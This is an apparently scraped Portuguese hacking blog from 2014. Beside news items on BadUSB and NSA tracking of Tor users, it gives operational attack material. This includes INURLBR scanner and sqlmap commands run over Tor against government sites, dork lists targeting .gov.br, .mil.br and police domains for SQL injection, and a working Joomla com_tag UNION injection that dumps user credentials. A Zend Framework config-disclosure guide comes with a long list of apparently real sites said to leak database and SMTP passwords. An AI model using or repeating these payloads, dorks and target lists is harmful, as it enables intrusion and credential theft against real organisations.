Black Hat 2014 desse ano promete viu ~
Dois pesquisadores de segurança estão prestes a divulgar uma descoberta sobre o USB que decreta o formato como um dos mais inseguros da atualidade.
Karsten Nohl e Jakob Lell construíram provas de conceito indicando que é possível contaminar uma unidade USB sem tocar na memória flash, focando apenas no firmware que controla suas funções.
Isso significa que nem a varredura mais completa encontraria o arquivo malicioso, e que qualquer coisa que use saída USB pode ser infectada - incluindo periféricos como teclado e mouse, além de pendrives.
Eles conseguiram colocar malwares nos chips usados para conectar um dispositivo ao computador e esses arquivos maliciosos são capazes de controlar funções e alterar pastas, além de direcionar o tráfego da internet a sites de interesse do atacante. Tudo sem serem notados.
O USB pode infectar o computador ou ser infectado por ele, e em nenhum dos casos o usuário comum tem chance de descobrir. Apenas um especialista com conhecimentos em engenharia reversa poderia encontrar o problema, mas só se estivesse procurando - e o firmware não costuma levantar suspeitas.
Os pesquisadores mostrarão como isso funciona durante a Black Hat, conferência anual sobre segurança que ocorre na semana que vem em Las Vegas, na intenção de estimular as pessoas a tomarem cuidado com o USB, porque este é um problema sem solução.
O que Nohl e Lell pretendem com a divulgação de suas descobertas é fazer um alerta para que as pessoas tratem dispositivos como pendrives da mesma forma que tratam seringas: cada um só pode usar o seu. É a única forma de garantir que não haverá complicações.
Nesta nova forma de pensar, você tem que considerar uma USB infectados e jogá-lo fora assim que ele toca em um computador não-confiável. "
Nohl e Lell, os investigadores para a consultoria de segurança SR Labs, estão longe de ser o primeiro a apontar que os dispositivos USB pode armazenar e espalhar malware. Mas os dois hackers não se limitou a copiar as suas próprias infecções com códigos personalizados para a memória de dispositivos USB '. Eles passaram meses engenharia reversa do firmware que executa as funções básicas de comunicação de dispositivos USB-os chips controladores que permitem que os dispositivos para se comunicar com um computador e permitir que os usuários mover arquivos dentro e fora deles. Sua descoberta central é que firmware USB, que existe em diferentes formas em todos os dispositivos USB, pode ser reprogramado para esconder código de ataque. "Você pode dar a seu povo em segurança de TI, eles digitalizá-lo, apagar alguns arquivos, e dá-lo de volta para você dizendo que é 'clean'", diz Nohl. Mas a menos que o cara de TI tem as habilidades de engenharia reversa para encontrar e analisar se o firmware, "o processo de limpeza nem sequer tocar os arquivos de que estamos falando."
http://www.wired.com/2014/07/usb-security/
quinta-feira, 31 de julho de 2014
terça-feira, 29 de julho de 2014
Vídeo Aula - Script InurlBr + SQLMAP + DecrypterMD5
Uma simples demonstração de funcionamento do SCANNER INURLBR junto com SQLMAP e DECRYPTERMD5.
Comandos utilizado:
php inurlbr.php --dork 'inurl:especialidades.php?id= site:gob.pe' --exploit-get '%27' -q 6 -s inurl_result.txt -p socks5://[email protected]:9050 --tor-random
Opções:
--dork = Define a dork que sera utilizada nos motores de busca
--exploit-get = Define o exploit via get, que será injetado em cada URL encontrada
-q = Define o motor de busca (ex.: google, bing, yahoo e etc...)
-s = Define o arquivo de saída, onde será armazenada as URLS encontradas
-p = Define o proxy para manter o anomimato
--tor-random = Habilita a função do tor randomico, a cada execução do script, o TOR muda de IP
Maiores detalhes:
https://github.com/googleinurl/SCANNER-INURLBR
Comando SQLMAP:
sqlmap --tor --tor-type=SOCKS5 -u http://sitevull.gob.pe/ --current-db --time-sec 10
Para utilizar o parametro "--tor" é necessário que esteja rodando localmente na porta 9050
Parrot e derivados: # service tor start
Verificar se está rodando: # netstat -an | grep 9050
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN
Comando utilizado DECRYPTERMD5:
php md5.php --md5 HASH --proxy socks5://[email protected]:9050
Opções:
--md5 = Informando o tipo do HASH
--proxy = Ativando o proxy para anomimato
Para maiores informações utilize: # php md5.php --help
segunda-feira, 28 de julho de 2014
INURLBR API face V1.0 - PESQUISA DE DADOS PUBLICOS FACEBOOK
Script feito em php que pesquisa dados públicos através de requests do próprio facebook.
Temos acesso ao seguinte resultado:
ID::
USERNAME::
NOME::
PRIMEIRO NOME::
SOBRENOME::
SEXO::
LOCAL::
FOTO LOGO PEQUENA::
FOTO LOGO GRANDE::
FOTO LOGO::
FOTO::
Exemplo de uso:
[+] Pesquisa dados facebook, Ex: php face.php zuck
[ RETORNO ]
Baixar:: http://pastebin.com/TdfymVXr
Temos acesso ao seguinte resultado:
ID::
USERNAME::
NOME::
PRIMEIRO NOME::
SOBRENOME::
SEXO::
LOCAL::
FOTO LOGO PEQUENA::
FOTO LOGO GRANDE::
FOTO LOGO::
FOTO::
Exemplo de uso:
[+] Pesquisa dados facebook, Ex: php face.php zuck
Baixar:: http://pastebin.com/TdfymVXr
Dorks variadas voltadas pra sqlinjection.
Busca erros sql sites .gov, falhas fbconnect_action e outras variantes de erros.
site:.websiteseguro.com inurl:produto.php?id= site:.com /ccbill/ "DOCUMENT_ROOT" ext:cgi inurl:game.php?id= inurl:mil inurl:"/?fbconnect_action=myhome" site:.gov.br "Microsoft OLE DB Provider" site:.esporte.gov.br ext:asp site:.esporte.gov.br (id|new|ver) site:.esporte.gov.br (id|new|ver) site:.psdb.org.br ext:asp id site:.websiteseguro.com inurl:produto.php?id= site:.globo.com ext:php mysql_ site:.gov.br .php?id= syntax; -pdf -policiacivil site:.gov.br SQL "syntax;" site:.ap.gov.br "SQL syntax;" ext:php site:.gov.br ext:sql -svn site:.nsa.gov PDF -public_info site:.mil.br "mil br" index.php?option= view site:.com inurl:tinybrowser ext:php intitle: TinyBrowser site:.gov.br (error) mysql (prefeitura) ext:php -pdf site:br index.php?option=com_user site:.gov.br .php?id= syntax; site:.gov.br ext:php (id*=|view=) site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection" site:rj.gov.br (php|asp|aspx) ? id site:.gov.br syntax; -pdf inurl:(|&id=|?id=|) site:br ext:asp (id*=|view=) 80040E14 site:.com.br ext:asp (id*=|view=) 80040E14 -superasp site:.anatel.gov.br ext:asp site:.gov.br (php|asp|aspx) ? id notic site:.mg.gov.br (php|asp) ?id= intitle:camara site:.gov.br ext:php (id*=|view=) intitle:camara site:.gov.br ext:php (id*=|view=) -projetodomhelder intitle:prefeitura site:.gov.br ext:php (id*=|view=) syntax; inurl:?fbconnect_action= myhome&fbuserid=* site:br inurl:view.php?id=* ext:php -Bug -moodle site:.com.br inurl:"ver_news.php?id=" site:.ceara.gov.br ext:asp site:.sp.gov.br inurl:.php? intext:"Warning" -policiacivil intext:"vBulletin" inurl:install/upgrade.php site:.ceara.gov.br ext:asp site:.ceara.gov.br ext:asp "*.asp?" "=*" inurl:.policiacivil.sp.gov.br modules inurl:.policiacivil.sp.gov.br modules ".php?" inurl:"/?fbconnect_action=myhome" "id=" & intext:"Warning: mysql_fetch_array() "id=" & intext:"Warning: getimagesize() "id=" & intext:"Warning: session_start() "id=" & intext:"Warning: mysql_num_rows() "id=" & intext:"Warning: mysql_query() "id=" & intext:"Warning: array_merge() "id=" & intext:"Warning: preg_match() "id=" & intext:"Warning: ilesize() "id=" & intext:"Warning: filesize() site:.ar inurl:fbconnect_action= fbuserid= intext:User site:.ar inurl:fbconnect_action= fbuserid= inurl:fbconnect_action= fbuserid= intext:User (uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) inurl:fbconnect_action= fbuserid= intext:User (uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php (id*=|view=) inurl:(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php inurl:pageid? inurl:.policiacivil.sp.gov.br modules site:sp.gov.br "Warning:" ext:php
quinta-feira, 24 de julho de 2014
Introdução SCANNER INURLBR V1.0
*Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a validação personalizada interna para cada alvo/url encontrada.
*Captura de emails.
*Execução de comandos direto no console para cada possível vulnerável. *Execução de comandos direto no console para todo alvo encontrado. *Analise de urls com base em arquivo txt, sem necessidade de usar motor de busca. *Definição de proxy. *Opção proxy TOR randômico.
_____ (_____) (() ()) \ / \ /
/=\
[___]
[INURLBR V1.0]
------------------------------------------------------------------------------
Explicando comando -q
Que é responsável por definir qual motor de busca vai efetuar os trabalhos.
-q tem acesso a 12 motores de busca.
1 - www.google.com.br
2 - www.bing.com
3 - br.search.yahoo.com
4 - www.ask.com
5 - search.hao123.com.br
6 - ajax.googleapis.com
7 - search.lycos.com
8 - busca.uol.com.br
9 - us.yhs4.search.yahoo.com
10 - pesquisa.sapo.pt
11 - www.dmoz.org
12 - www.gigablast.com
all - todos motores de busca
Default: 1
Exemplo: -q {op}
Uso:
-q 1
-q 5
Múltiplos motores -q 1,2,5,6,11
Todos motores -q all
Ex:
-----------------------------------------------------------------------------------------------------------------------------------
./inurlbr.php --dork 'site:br php?id=' -q 1,6 -s arquivo.txt --exploit-get "'´0x27"
-----------------------------------------------------------------------------------------------------------------------------------
0xVÍDEO[1]:
0xVÍDEO[2] - PARROT OS:
0xVÍDEO[2] - Usando Exploit joomla
0xDetalhes:
* joomla component com_tag (tag_id) SQL Injection Vulnerability
* [Joomla componente]
* com_tag (tag_id) Vulnerável a SQL-injection
0xCOMANDOS INURLBR:
./inurlbr.php --dork 'inurl:option=com_tag' -q 1,6 -s joomla.txt -t 3 --exploit-get '/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component' -a 'Edit Tags'
0xDOWNLOAD SCRIPT
https://github.com/googleinurl/SCANNER-INURLBR
Ref:
http://blog.inurl.com.br/2014/07/joomla-component-comtag-tagid-sql.html
segunda-feira, 21 de julho de 2014
Testando novo Scanner inurl beta
BETA - Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a captura de emails & validação personalizada interna para cada alvo/url encontrada.
#ZEND FRAMEWORK,#ERROS MYSQL,#ERROS MICROSOFT,#ERROS JDBC,#ERROS ORACLE,#ERROS POSTGRESQL,#ERROS PHP,#ERROS ASP,#ERROS LUA,#ERROS INDEFINIDOS_____ (_____) (() ()) \ / \ / /=\ [___]#####################################
#GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
#SCRIPT NAME: INURLBR
#AUTOR: Cleiton Pinheiro
#Nick: Googleinurl
#Blog: http://blog.inurl.com.br
#twitter: /@googleinurl
#facebook: /InurlBrasil
#Versão: 1.0
#-------------------------------------------------------------------------------
#PHP Version 5.4.7
#php5-curl LIB
#php5-cli LIB
#cURL support enabled
#cURL Information 7.24.0
#Apache 2.4
#allow_url_fopen On
#permission Reading & Writing
#User root privilege, or is in the sudoers group
#Operating system LINUX
#Proxy random TOR
#####################################
[YOUTUBE]
https://www.youtube.com/watch?v=_zpYVreCR_w
sexta-feira, 18 de julho de 2014
DecrypterMD5 API
[ INURLBR API DecrypterMD5 ]
bdbbe98d4714585c4a2eae76cd0e3cae
xNeither war between hackers, nor peace for the system.
----------------------------------------------------------------------------------
[+] Pesquisa por arquivo, Ex: php md5.php --file filemd5.txt[+] Pesquisa simples, Ex: php md5.php --md5 21232f297a57a5a743894a0e4a801fc3
_____ (_____) (() ()) \ / \ / /=\ [___]
----------------------------------------------------------------------------------
- Exemplo: --proxy {proxy:porta}
- Uso: --proxy localhost:8118
--proxy socks5://[email protected]:9050
--proxy http://admin:[email protected]:8080
O uso da rede TOR no script garante que você não seja bloqueado em requisições massivas.
Baixar:: http://pastebin.com/grYTVJKF
quarta-feira, 16 de julho de 2014
Explorando falha no Zend Framework Full Info Disclosure
Explorando Full Info Disclosure
Tal falha disponibiliza a leitura do arquivo ini dentro de aplicações web que usam Zend Framework, tais aquivos contem senhas de bancos e smtp.
Vulnerabilidade[0]=> http://target.com/application/configs/{arquivo}.ini
Ex:
http://target.com/application/configs/application.ini
http://target.com/application/configs/db.ini
http://target.com/application/configs/config.ini
Conteúdo de arquivo podemos encontrar os seguintes parâmetros.
//Dados de acesso banco
resources.db.params.host = "mysql.taget.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123455"
//E também dados de acesso smtp
resources.mail.transport.host ="smtp.target.com.br"
resources.mail.transport.auth = "loginre"
sources.mail.transport.username = "wangxydlutre"
sources.mail.transport.password = "12333"
DORK[0]=> inurl:/application/configs/application.ini
DORK[1]=> site:com ext:ini inurl:/application/ -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"
DORK[2]=> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini
DORK[3]=> inurl:/configs/ "params.password" db.ini ext:ini
DORK[4]=> -github.com -mozilla.org -.google.com inurl:/application/ ext:ini password
[+][ COMMND SCANNER INURLBR ]
./inurlbr.php --dork 'site:com ext:ini inurl:/application/ -github -assembla -inurl:mozilla -inurl:svn "params.password"' -s zend.txt -q 1,6,7,14,22
[+][ VALIDATION ZEND FRAMEWORK ]
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';
0xExemplo de achado:
https://www.thoex.com/urrunarrak-handball/application/configs/application.ini?
https://www.thoex.com/urrunarrak2/application/configs/application.ini?
http://www.rydusa.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://www.getsocialwithrb.com/rec0219/airwick/application/configs/application.ini
http://www.aps-cctv.com/boardPhotos/application.ini
http://snobmonkey.com/test/application/configs/application.ini
http://velcro-lab.com/touch/application/configs/application.ini
http://www.ratcmatrimony.com/application/configs/application.ini
http://ucgoz.com/deneme2/application/configs/application.ini
http://ifood.introserver.com/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/admin/application/configs/application.ini
http://www.altusinfra.com/application/configs/application.ini
http://www.thenamesticker.com/application/configs/application.ini
http://stasdavydov.com/price_cmp/application/configs/application.ini
https://www.mitylite.com/application/configs/application.ini
http://dev.blancali.com/_old2/application/configs/application.ini
http://city-immobilier.com/application/configs/application.ini
http://www.emotionla.com/staging/vivanda/vivanda-mobile/application/configs/application.ini
http://23sec.com/api/application/configs/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
http://www.rydusa.com/application/configs/application.ini
http://www.prod2020.com/_hybris-cra/application/configs/application.ini
http://xolotlti.com/fabricadecine/application/configs/application.ini
http://www.test.unibox.com/application/configs/application.ini
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini
http://users.spytosave.com/spyapp/application/configs/application.ini
http://www.monigrafica.com/application/configs/application.ini
http://clossmancommunications.com/frapi/admin/application/config/application.ini
http://archi-tech-media.com/thedigitalkingdom/application/configs/application.ini
http://www.kreatera.com/library/Benux/Application/configs/application.ini
http://li258-109.members.linode.com/application/configs/application.ini
http://www.techques.com/question/1-4484965/How-to-set-database-time-zone-in-application.ini
http://bizarrefx.com/bfx/searchd/application/configs/application.ini
http://www.hellobrothers.com/jobs/application.ini
http://www.ovdev.mit-consult.com/exc1/application/configs/application.ini
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini
http://www.digilibro.com/Crisol/RestServer/application/configs/application.ini
http://secure.vfwebserver.com/ewe/application/configs/application.ini
http://ihuntyou.com/agrobrain/trunk/application/configs/application.ini
http://ronlinecdn.com/st/application/configs/application.ini
http://yodpolitician.yodsoft.com/application/configs/application.ini
http://kerberosdevelopment.com/centurion/application/configs/db.ini
http://www.dev-stagingserver.com/noophy/application/configs/application.ini
http://www.intell-sol.com/subdomains/wandelion/admin/application/configs/application.ini
http://paintourhome.com/application/configs/application.ini
http://www.mywebsitedemos.com/broomberg/application/configs/application.ini
http://fidelcrm.com/fbconnect/zblog/application/configs/application.ini
http://developermalik.com/chad/application/configs/application.ini
http://developermalik.com/uPolitics/application/configs/application.ini
http://km.comuf.com/application/configs/application.ini
http://qljsystems.com/doctrine2/ralphschindler-NOLASnowball-3c9f906/application/configs/application.ini
http://50-87-21-130.unifiedlayer.com/astonis/application/configs/application.ini
http://bepcongnghiepjsc.com/application/configs/application.ini
http://galaxybis.com/demos/zf1/application/configs/application.ini
http://masdag.com/watchit/application/configs/config.ini
http://www.comsucopia.com/application/configs/application.ini
http://campusrain.com/wow/application/configs/application.ini
http://www.myanmar-restaurants.com/updates/myanmar/stage/application/configs/sites/myanmar-updates.ini
http://churchcims.com/staging/application/configs/application.ini
http://hashib23.uniquewebers.com/hospital/application/configs/application.ini
http://support.orioly.com/svjetskiputnik.hr/application/configs/application.ini
http://tmh.riktamtech.com/blinkword/application/configs/application.ini
http://shopping.idincorp.com/application/configs/application.ini
https://www.arabforwarding.com/vhosts/loyacjordan.org/httpdocs/loyac/application/configs/application.ini
https://www.arabforwarding.com/vhosts/__www.fnms-medical.com/httpdocs/application/configs/application.ini
http://elamatute.com/application/configs/application.ini
http://www.originalsexnetwork.com/application/configs/application.ini
http://www.palstu.com/contactus2/application/configs/application.ini
http://web.ontuts.com/wp-content/uploads/tutoriales/zendframework/zendframework_layouts/application/config/application.ini
https://daralyasmine.com/vhosts/daralyasmine.com/httpdocs/application/configs/application.ini
http://www.tributosonline.com/application/configs/application.ini
http://www.nichequotes.com/zend/application/config.ini
http://webkathon.com/alumni/application/configs/application.ini
http://web1.kindlebit.com/PHP-Team/vijay/don/codecanyon-4210316-monsterfile-multiuser-file-management/MonsterFile/application/configs/monster.ini
http://www.investmysite.com/application/config/config_db.ini
http://dulichcampuchiagiare.com/application/configs/application.ini
http://eshopbox.com/checkout/application/configs/application.ini
http://www.oi915.com/application/modules/admin/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
http://www.prod2020.com/france-tv/application/configs/db.ini
http://amdinner.com/admin/application/application.ini
http://www.emotionla.com/clientes/plazavea/plazavea-qr/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/application/configs/application.ini
http://www.palstu.com/tawjihi/application/configs/application.ini
http://ronlinecdn.com/sap/application/configs/application.ini
http://myanmar-restaurants.com/updates/movie/prod/application/configs/sites/myanmar-updates.ini
Exploit:
http://www.exploit-db.com/exploits/29921/
terça-feira, 15 de julho de 2014
ALGORITHM filme sobre hacking
<the_hacker_movie>
No centro da trama de ALGORITHM são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia.
Primeiro Trailer
http://www.thehackermovie.com/
QUEBRAR SENHA DO ROOT com live CD
QUEBRAR SENHA DO ROOT
Acessando seu disco rígido com live CD.
Monta a partição, por exemplo: $mount /dev/sda2/ /mnt
Caso não tenha a pasta mnt crie ela: mkdir /mnt
Acessa a partição/sistema com o chroot: $chroot /mnt /bin/bash
Agora todo comando que for efetuado no terminal vai ser executado na maquina real,
Ou seja trocar a senha root do seu usuário
Ex:
$passwd usuário
$passwd root
Existe outra forma
Depois de montar a partição e executar o comando chroot
sudo gedit /etc/shadow
Primeira linha algo assim
root:AQUI_TEM_SENHA:16100:0:99999:7:::
Ex: root:$6$DsDwdas$4xFds.EfzTJl3I:16100:0:99999:7:::
Apague a senha
Vai ficar algo assim:
root::16100:0:99999:7:::
Feche o arquivo e salvando o mesmo, logo depois reinicia a maquina sem o cdlive.
E troque a senha do root, o mesmo serve para outros usuários.
$passwd root
quinta-feira, 3 de julho de 2014
joomla component com_tag (tag_id) SQL Injection Vulnerability
[Joomla componente]
[X] com_tag (tag_id) Vulnerável a SQL-injection
0xDORK[0]: inurl:option=com_tag
0xExploit[0]: /index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
Exemplo:
http://WWW.URL.COM/index.php?option=com_tag
&controller=tag&task=add&article_id=1
/index.php?option=com_tag&controller=tag&task=add&article_id=-ID{vull}
Injetando:
http://
WWW.URL.COM
/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
RESPOSTA:
REF:http://www.exploit-id.com/web-applications/joomla-component-com_tag-tag_id-sql-injection-vulnerability
ALGUNS RESULTADOS:
Usando scanner INURLBR:
REPOSITÓRIO::: http://pastebin.com/Tb0Qp0qY
XKeyscore exposto: NSA define todos os utilizadores da rede Tor alemães como "extremistas".
A NSA foi revelado para marcar e considerar potenciais "extremistas" todos os usuários do serviço de internet anonymizer Tor. Entre aqueles que são centenas de milhares de pessoas preocupadas privacidade como jornalistas, advogados e ativistas de direitos.
Procurando software de criptografia, como o sistema operacional baseado em Linux Tails também coloca você no grid NSA, como Lena Kampf, Jacob Appelbaum e John Goetz revelado no site alemão Tagesschau. O relatório é baseado na análise do código-fonte do software usado por um programa de vigilância eletrônica XKeyscore da NSA.
Tor é um sistema de servidores, que encaminha as solicitações de usuários por meio de uma camada de conexões seguras para torná-lo impossível identificar IP de um usuário a partir dos endereços dos sites que ele / ela visita. A rede de cerca de 5.000 é operado por entusiastas e usado por centenas de milhares de pessoas de privacidade-preocupado todo o mundo. Alguns deles vivem em países com regimes opressivos, que punem os cidadãos para visitar sites que considerem inapropriado.
Mas o site apenas visitar projeto Tor coloca você na lista vermelha da NSA, diz o relatório. Mas o mais importante é que ele monitora as conexões com os chamados Autoridades Directory, os oito servidores, que atuam como gateways para todo o sistema.
A NSA foi particularmente vigiar alemão baseado Autoridades Diretório Tor. Uma é operado pelo grupo de hackers com sede na Alemanha Chaos Computer Club, o outro pelo estudante de ciência da computação Sebastian Hahn, que disse aos jornalistas que a revelação é "chocante".
O sistema em si não parece ser comprometida no entanto, mas a NSA recebe dados como endereços IP de quem o utiliza, o suficiente para cross-referenciá-los com outras bases de dados da agência tem acesso.
Rede anonymizer Tor entre as metas da NSA, vazamentos Snowden revelar
Há indícios de que a NSA pode ser de coleta não só os metadados das pessoas na lista, mas também ler as suas trocas de e-mail com Tor.
Um interesse em Tor não é a única maneira de fazê-lo a lista de vigilância da NSA. Até mesmo buscas na web para outro software de criptografia faz de você um alvo, bem como, segundo o relatório.
Perturbadoramente, comenta programador NSA na etiqueta de código fonte desses pego pelo sistema americano "extremistas".
O relatório diz que XKeyscore marca todas as pessoas que atingiram a luz vermelha em sua grade, com excepção dos conectando de membros dos cinco olhos, um grupo de países a cooperar na recolha de informações, ou seja, os EUA, Reino Unido, Canadá, Austrália e Nova Zelândia .
Fonte: http://rt.com/news/170208-nsa-spies-tor-users/
Assinar:
Postagens (Atom)